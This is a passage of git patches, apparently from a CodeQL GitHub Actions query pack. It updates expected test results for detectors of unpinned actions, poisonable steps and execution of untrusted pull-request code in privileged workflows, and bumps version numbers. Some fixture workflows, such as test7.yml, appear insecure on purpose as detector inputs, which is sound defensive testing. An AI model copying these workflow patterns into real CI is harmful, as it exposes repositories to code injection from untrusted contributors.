run --silent benchmark ${{ steps.bench-command.outputs.bench }}) + processed=$(node ./benchmark/ci-helper.js "$result") + echo "BENCH_RESULT<> $GITHUB_OUTPUT + echo "### PR Benchmark" >> $GITHUB_OUTPUT + echo "$processed" >> $GITHUB_OUTPUT + echo "BENCHEOF" >> $GITHUB_OUTPUT + shell: bash diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index d95cf6fef090..124a26b1d47a 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -16,4 +16,5 @@ | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref '1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref '4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref '1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | Unpinned 3rd party Action 'Benchmark' step $@ uses 'pnpm/action-setup' with ref '3', not a pinned commit hash | .github/workflows/test7.yml:24:9:27:6 | Uses Step | Uses Step | | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Unpinned 3rd party Action 'unpinned_tags.yml' step $@ uses 'foo/bar' with ref '1', not a pinned commit hash | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 78e2afa2747a..f2d229e80bb5 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -304,6 +304,27 @@ edges | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:39:9:43:6 | Run Step | | .github/workflows/test6.yml:19:9:39:6 | Uses Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | | .github/workflows/test6.yml:39:9:43:6 | Run Step | .github/workflows/test6.yml:43:9:45:52 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:24:9:27:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:27:9:33:6 | Uses Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:24:9:27:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:27:9:33:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | @@ -335,5 +356,8 @@ edges | .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow. | +| .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Execution of untrusted code on a privileged workflow. | From 56b70981ae823bbe19fd50e6cd9985d6b9f6e21f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 5 Jul 2024 18:18:04 +0200 Subject: [PATCH 379/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 59ab88b42e41..dd99208f5e34 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.13 +version: 0.1.14 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f25fd70619fd..fe02dad9c55e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.13 +version: 0.1.14 groups: [actions, queries] suites: codeql-suites extractor: javascript From bc483fc380e5303a8939f695d885ec6d50ddd1ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 6 Jul 2024 22:44:57 +0200 Subject: [PATCH 380/707] Add poisonable step test --- .../.github/workflows/poisonable_steps.yml | 3 +- .../library-tests/poisonable_steps.expected | 3 +- ql/test/library-tests/test.expected | 161 ++++++++++-------- 3 files changed, 90 insertions(+), 77 deletions(-) diff --git a/ql/test/library-tests/.github/workflows/poisonable_steps.yml b/ql/test/library-tests/.github/workflows/poisonable_steps.yml index 3e31507cef1e..608b3d5a09f8 100644 --- a/ql/test/library-tests/.github/workflows/poisonable_steps.yml +++ b/ql/test/library-tests/.github/workflows/poisonable_steps.yml @@ -21,5 +21,4 @@ jobs: - run: python scripts/generate_theme.py --outfile js/storybook/theme.css - run: ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - run: bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css - - + - run: xvfb-run ./mvnw clean package diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index 62ffff3c15c2..52f38506f09d 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -15,4 +15,5 @@ | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index efb0bca69528..19eda82df481 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected @@ -6,20 +6,20 @@ files workflows | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | reusableWorkflows compositeActions jobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | localJobs | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:32:5:40:53 | Job: job2 | extJobs @@ -61,7 +61,8 @@ steps | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | @@ -106,7 +107,8 @@ runSteps | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | @@ -184,7 +186,8 @@ runStepChildren | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | -| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:24:9:24:43 | Run Step | .github/workflows/poisonable_steps.yml:24:14:24:42 | xvfb-run ./mvnw clean package | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -337,82 +340,86 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | -| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | -| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | -| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | -| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:24:43 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:24:43 | Job: local_commands | | .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| 